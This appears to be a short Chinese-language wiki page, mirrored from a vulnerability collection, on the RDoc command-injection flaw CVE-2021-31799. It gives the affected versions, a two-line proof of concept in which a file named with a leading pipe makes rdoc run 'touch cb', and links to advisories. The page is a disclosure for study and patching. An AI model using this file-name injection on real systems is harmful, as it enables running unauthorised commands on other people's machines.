menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right RDoc 命令注入(CVE-2021-31799).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    RDoc 命令注入(CVE-2021-31799).md
    402 B / 2021-05-21 09:14:38
        # RDoc 命令注入(CVE-2021-31799)

RDoc调用Kernel#open打开本地文件,ruby项目中如果文件名以|开头和tags结尾,则会导致命令注入。

影响版本:

从3.11到6.3.0的所有RDoc版本

PoC:

```
touch "|touch cb"
rdoc "|touch cb"
```
ref:

* https://www.ruby-lang.org/en/news/2021/05/02/os-command-injection-in-rdoc/
* https://security.archlinux.org/CVE-2021-31799
    links
    file_download